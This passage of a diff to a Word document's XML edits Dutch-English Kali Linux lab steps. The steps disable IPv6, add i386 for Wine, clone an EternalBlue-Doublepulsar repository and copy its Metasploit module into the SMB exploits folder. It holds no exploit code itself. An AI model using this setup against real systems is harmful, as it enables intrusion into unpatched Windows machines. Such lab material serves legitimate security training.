+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Disable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> IPv6</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3466,44 +3710,326 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>nano</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>sysctl.conf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Voeg toe onderaan file:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t>net.ipv6.conf.all.disable_ipv6 = 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>dpkg</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>net.ipv6.conf</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> --add-architecture i386</w:t>
+        <w:t>.default.disable_ipv6 = 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>net.ipv6.conf</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.lo.disable_ipv6 = 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>net.ipv6.conf</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.tun0.disable_ipv6 = 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Sla op, exit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>CTRL + X</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Y</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Enter</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Reboot Kali</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>reboot</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3521,7 +4047,7 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Update apt-get</w:t>
+        <w:t>Add required architecture for wine32</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3534,15 +4060,15 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>sudo</w:t>
       </w:r>
@@ -3551,9 +4077,45 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> apt-get update</w:t>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>dpkg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>add-architecture</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> i386</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3564,14 +4126,28 @@
           <w:numId w:val="11"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Clone the required exploit (Default ones don't reliably exploit)</w:t>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Update </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>apt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>-get</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3584,16 +4160,44 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>git clone https://github.com/w0rtw0rt/EternalBlue</w:t>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>apt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>-get update</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3604,40 +4208,120 @@
           <w:numId w:val="11"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Start </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>metasploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> framework once to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>initialize</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> database</w:t>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Clone</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>the</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>required</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Default </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>ones</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>don't</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>reliably</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3650,19 +4334,123 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>msfconsole</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">git </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>clone</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> https://github.com/w0rtw0rt/EternalBlue</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Start </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>metasploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>framework</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>once</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>initialize</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> database</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3674,14 +4462,38 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>msfconsole</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>exit</w:t>
       </w:r>
@@ -3694,28 +4506,78 @@
           <w:numId w:val="11"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Place </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Place</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>eternalblue-doublepulsar.rb</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> file into the exploits folder</w:t>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>into</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>the</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exploits</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> folder</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3728,15 +4590,15 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>sudo</w:t>
       </w:r>
@@ -3745,16 +4607,34 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> cp EternalBlue/Eternalblue-Doublepulsar-Metasploit/eternalblue-doublepulsar.rb /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>cp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> EternalBlue/Eternalblue-Doublepulsar-Metasploit/eternalblue-doublepulsar.rb /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>usr</w:t>
       </w:r>
@@ -3763,7 +4643,7 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>/share/</w:t>
       </w:r>
@@ -3772,25 +4652,61 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>metasploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>-framework/modules/exploits/windows/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>metasploit-framework</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>/modules/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exploits</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>windows</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>smb</w:t>
       </w:r>
@@ -3804,14 +4720,22 @@
           <w:numId w:val="11"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Install Wine</w:t>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Install</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
